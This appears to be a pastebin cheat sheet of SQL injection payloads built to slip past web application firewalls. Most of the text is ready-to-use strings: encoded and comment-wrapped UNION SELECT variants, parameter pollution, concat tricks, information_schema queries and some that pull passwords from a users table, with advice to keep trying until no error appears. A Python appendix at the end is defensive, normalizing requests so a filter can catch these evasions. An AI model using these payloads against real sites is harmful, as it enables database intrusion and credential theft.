KingSkrupellos

WAF (Web Firewall) SQLi Bypass Techniques

Nov 30th, 2017
  1. WAF (Web Firewall) SQLi Bypass Techniques / ++REP Please hit the Like button
  2.  
  3. KingSkrupellos - https://www.cyberizm.org/cyberizm-waf-web-guvenlik-duvari-sqli-bypass-teknikleri.html
  4.  
  5. ---------------------------------------WAF BYPASS---------------------------------
  6. 1. Union Select :-
  7. (a):- /*!50000union*/ select Note:- 00000/12345 can also be used; /*!' '*/ can also be used
  8. (b):- /*!50000union*/ /*!50000select*/
  9. (c):- %0AUNION%23 [can also be used for select] (this is URL-encoded)
  10. (d):- +--%0Aunion+--%0Aselect+
  11. (e):- +--%0Aunion+--%0Aselect+--%0A1,--%0A2,--%0A3,--%0A4,--%0A5 [i.e. the URL-encoded technique is used in the numbers too]
  12. (f):- /%2A%2A/union/%2A%2A/select/%2A%2A/ [Encode to Hex Forbidden Technique: Functions Use:- 1. /%2A%2A/ 2. %2F**%2F ]
  13. (g):- +UnIoN+SeLselectECT+
  14. (h):- Use any characters like :- |, ?, ", ', *, %, � , [], ;, :, \/, $, �, ()... ex:- +uni*on+sel*ect+
  15. (i):- +UnIoN+SeLeCt+
  16. (j):- HTTP Parameter Pollution :- /* &id= */union/* &id= */select/* &id= */
  17. List of all HTTP Technique:- /* &c= */
  18. /* &b= */
  19. /* &id= */
  20. /*&q=*/
  21. /*&prodID=*/
  22. /*&abc=*/
  23. q=select
  24. union /* and b=*/ select
  25. q=select/*&q=*/
  26. q=*/from/*
  27. q=select/*&q=*/name&q=password/*&q=*/
  28. &b= */select+1,2 /?a=1+ union/* &b= */
  29. q=*/name q=password/*
  30. ?id=1 /**/union/* &id= */select/* &id= */pwd/* &id= */from/* &id= */users
  31.  
  32. ________________________________________________________________
  33.  
  34. (k):- CRLF BYPASS TECHNIQUES:-
  35. +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D/*!
  36. (l):- When a fatal error occurs :-
  37. When this error occurs, try null like this :- union select null,2,3,4,5-- error produced
  38. union select 1,null,2,3,4,5-- error produced
  39. union select 1,2,null,4,5-- no error produced
  40. _________________________________________________________________________
  41.  
  42. Try these techniques until you no longer get an error
  43. (m):- {
  44. +--+Union+--+Select+--+
  45. +#uNiOn+#sEleCt+
  46. +union+distinct+select+
  47. +union+distinctROW+select+
  48. uni<on all sel<ect
  49. +union%23aa%0Aselect+
  50. 0%a0union%a0select%09
  51. %0Aunion%0Aselect%0A
  52. +UnIoN+SeLselectECT+
  53. /%2A%2A/union/%2A%2A/select/%2A%2A/
  54. %2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
  55. +%2F**%2Funion%2F**%2Fselect+
  56. +UnIoN/*&a=*/SeLeCT/*&a=*/
  57. +%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D
  58. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  59. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  60. union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
  61. /*!50000union*/+/*!50000select*/
  62. UNIunionON+SELselectECT
  63. +union+distinct+select+
  64. +union+distinctROW+select+
  65. union+/*!select*/+1,2,3
  66. union/**/select/**/1,2,3
  67. uni%20union%20/*!select*/%20
  68. /**//*!union*//**//*!select*//**/
  69. union%23aa%0Aselect
  70. /**/union/*!50000select*/
  71. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  72. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  73. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  74. id=1+�UnI�On�+'SeL�ECT� <-MySQL only
  75. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  76. }
  77. _____________________________________________________________
  78.  
  79. (n):- Concat Bypassing:-
  80. {
  81. group_concat()
  82. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  83. group_concat(,0x3c62723e)
  84. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  85. CoNcAt()
  86. concat%00()
  87. %00CoNcAt()
  88. CONCAT(DISTINCT )
  89. concat(0x3a,,0x3c62723e)
  90. /*!50000cOnCat*/
  91. concat_ws()
  92. concat_ws(0x3a,)
  93. CONCAT_WS(CHAR(32,58,32),version(),)
  94. REVERSE(tacnoc)
  95. binary(version())
  96. uncompress(compress(version()))
  97. aes_decrypt(aes_encrypt(version(),1),1)
  98. }
  99.  
  100. ________________________________________________________________
  101. (o):- Information schema Bypass :-
  102. 1.information_schema . tables
  103. 2.`information_schema`.`tables`
  104. 3./*!information_schema.tables*/
  105. 4.FROM+information_schema%20%0C%20.%20%09tables
  106. 5.(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA()) Alternative names:- 6.{
  107. information_schema.statistics
  108. information_schema.key_column_usage
  109. information_schema.table_constraints
  110. information_schema.partitions
  111. }
  112. 7. /*!50000column_name*/%0A%46roM%0AInfORmaTion_scHema . cOlumnS%0A%57heRe%0A/*!50000tAblE_naMe*/=hex table
  113.  
  114. 8. (/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)
  115.  
  116. 9. String-based SQLi:- add ' and end with one of these :- -- - -+-- +--+/ --+- #
  117. e.g. VULNERABLESITE/id=2' --+
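
Most entries above work only against a filter that matches its signature on the raw request. The following added example (not part of the original paste) shows the canonicalization an inspection layer needs before matching: repeated URL-decoding, unwrapping MySQL versioned comments, removing comments, and merging repeated parameters. The function names, the sample requests and the comma joiner for repeated parameters (a backend-dependent behaviour) are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

UNION_SELECT = re.compile(
    r"\bunion\b(?:\s+(?:all|distinct|distinctrow))?\s*\(?\s*select\b")

def naive_match(raw_query):
    """Signature applied to the raw request, as a weak filter would do."""
    return bool(re.search(r"union\s+select", raw_query, re.I))

def merged_params(query, joiner=","):
    """Join repeated parameters as the backend would (assumed here: comma)."""
    merged = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        merged.setdefault(name, []).append(value)
    return {name: joiner.join(values) for name, values in merged.items()}

def canonicalize(value, max_rounds=5):
    """Reduce a parameter value to roughly what a MySQL parser would see."""
    for _ in range(max_rounds):        # undo nested encodings: %252f -> %2f -> /
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\x00", "")
    # MySQL executes the body of /*!NNNNN ... */: keep the body, drop the wrapper
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # plain comment = whitespace
    value = re.sub(r"(?:#|--(?=\s))[^\n]*", " ", value)   # line comment ends at newline
    return re.sub(r"\s+", " ", value).strip().lower()

def flagged_params(query):
    """Names of parameters whose canonical form contains UNION ... SELECT."""
    return sorted(name for name, value in merged_params(query).items()
                  if UNION_SELECT.search(canonicalize(value)))

# Constructed requests built from fragments listed in the paste, plus one benign query
SAMPLES = [
    "id=1+/*!50000union*/+/*!50000select*/+1,2,3",
    "id=1%0Aunion%23aa%0Aselect%0A1,2,3",
    "id=1%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/1",
    "id=1 /**/union/* &id= */select/* &id= */pwd/* &id= */from/* &id= */users",
    "q=student+union+elections&page=2",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(naive_match(q), flagged_params(q), q)
```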